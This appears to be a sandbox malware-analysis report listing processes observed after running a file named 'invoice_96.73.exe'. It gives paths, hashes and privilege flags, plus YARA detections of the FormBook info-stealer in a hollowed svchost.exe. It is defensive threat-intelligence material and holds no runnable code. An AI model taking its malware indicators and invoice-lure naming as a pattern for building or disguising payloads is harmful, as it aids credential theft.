Target ID: 4
Start time: 06:11:50
Start date: 28/11/2024
Path: C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\invoice_96.73.exe"
Imagebase: 0x6f0000
File size: 20'992 bytes
MD5 hash: 54A47F6B5E09A77E61649109C6A08866
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.387515587.0000000000240000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.387578097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation: moderate
Has exited: true

Target ID: 5
Start time: 06:11:52
Start date: 28/11/2024
Path: C:\Windows\System32\alg.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\alg.exe
Imagebase: 0x100000000
File size: 1'577'472 bytes
MD5 hash: D51E3C5F1FB63103D04A4FDBBC56FEE7
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: false

Target ID: 6
Start time: 06:11:53
Start date: 28/11/2024
Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe
Wow64 process (32bit): false
Commandline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe
Imagebase: 0x140000000
File size: 1'537'536 bytes
MD5 hash: BBA4722DF24C70555CF255FAE1A123D7
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: false

Target ID: 12
Start time: 06:11:59
Start date: 28/11/2024
Path: C:\Windows\ehome\ehrecvr.exe
Wow64 process (32bit): false
Commandline: C:\Windows\ehome\ehRecvr.exe
Imagebase: 0x140000000
File size: 1'276'416 bytes
MD5 hash: 22DA4B53195377BBE2A2460989C3D203
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 13
Start time: 06:12:01
Start date: 28/11/2024
Path: C:\Windows\ehome\ehsched.exe
Wow64 process (32bit): false
Commandline: C:\Windows\ehome\ehsched.exe
Imagebase: 0x140000000
File size: 1'625'600 bytes
MD5 hash: C0B1AC1980E0EE5E641EA4C250791D87
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: false

Target ID: 14
                                                                                                                                                                Start time:06:12:03
                                                                                                                                                                Start date:28/11/2024
                                                                                                                                                                Path:C:\Windows\System32\FXSSVC.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\fxssvc.exe
                                                                                                                                                                Imagebase:0x140000000
                                                                                                                                                                File size:1'269'760 bytes
                                                                                                                                                                MD5 hash:862331ACCCC3F8DC8BF248C0E6CF16A3
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:15
                                                                                                                                                                Start time:06:12:04
                                                                                                                                                                Start date:28/11/2024
                                                                                                                                                                Path:C:\Windows\System32\ieetwcollector.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\IEEtwCollector.exe /V
                                                                                                                                                                Imagebase:0x140000000
                                                                                                                                                                File size:1'612'800 bytes
                                                                                                                                                                MD5 hash:475B5B41F2CFABE32500D1A9602C2A3E
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:16
                                                                                                                                                                Start time:06:12:06
                                                                                                                                                                Start date:28/11/2024
                                                                                                                                                                Path:C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:"C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                File size:1'661'952 bytes
                                                                                                                                                                MD5 hash:CC9BE47A84D7EB73D78181F087D654DC
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:17
                                                                                                                                                                Start time:06:12:06
                                                                                                                                                                Start date:28/11/2024
                                                                                                                                                                Path:C:\Windows\System32\msdtc.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\System32\msdtc.exe
                                                                                                                                                                Imagebase:0x140000000
                                                                                                                                                                File size:1'639'936 bytes
                                                                                                                                                                MD5 hash:8A39539F9626492BC25BBEF9E516EC26
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:false

                                                                                                                                                                Target ID:18
                                                                                                                                                                Start time:06:12:08
                                                                                                                                                                Start date:28/11/2024
                                                                                                                                                                Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                Imagebase:0x100000000
                                                                                                                                                                File size:1'625'600 bytes
                                                                                                                                                                MD5 hash:2568F4F643C82673898904F584A264BA
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:false

                                                                                                                                                                Target ID:20
                                                                                                                                                                Start time:06:12:09
                                                                                                                                                                Start date:28/11/2024
                                                                                                                                                                Path:C:\Windows\SysWOW64\perfhost.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:C:\Windows\SysWow64\perfhost.exe
                                                                                                                                                                Imagebase:0x1000000
                                                                                                                                                                File size:1'519'104 bytes
                                                                                                                                                                MD5 hash:4A3EAAF9D1C0E0BB3F263E7A314171FA
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:false

                                                                                                                                                                Target ID:21
                                                                                                                                                                Start time:06:12:10
                                                                                                                                                                Start date:28/11/2024
                                                                                                                                                                Path:C:\Windows\System32\Locator.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\locator.exe
                                                                                                                                                                Imagebase:0x100000000
                                                                                                                                                                File size:1'508'864 bytes
                                                                                                                                                                MD5 hash:16E5AF7C321FDD4D4ABCA40501F44C18
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:false

                                                                                                                                                                Target ID:22
                                                                                                                                                                Start time:06:12:11
                                                                                                                                                                Start date:28/11/2024
                                                                                                                                                                Path:C:\Windows\System32\snmptrap.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\System32\snmptrap.exe
                                                                                                                                                                Imagebase:0x100000000
                                                                                                                                                                File size:1'512'960 bytes
                                                                                                                                                                MD5 hash:2A428B8B0253AA1D839ED564BA512230
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:false

                                                                                                                                                                Target ID:25
                                                                                                                                                                Start time:06:12:13
                                                                                                                                                                Start date:28/11/2024
                                                                                                                                                                Path:C:\Windows\System32\vds.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\System32\vds.exe
                                                                                                                                                                Imagebase:0x100000000
                                                                                                                                                                File size:2'029'568 bytes
                                                                                                                                                                MD5 hash:CC2DA4A13C382DA8674052AB5005C252
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:false

                                                                                                                                                                Target ID:27
                                                                                                                                                                Start time:06:12:18
                                                                                                                                                                Start date:28/11/2024
                                                                                                                                                                Path:C:\Windows\System32\wbengine.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\system32\wbengine.exe"
                                                                                                                                                                Imagebase:0x100000000
                                                                                                                                                                File size:2'083'328 bytes
                                                                                                                                                                MD5 hash:B9B616B65A90E396A161A24A8A456884
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:false

                                                                                                                                                                No disassembly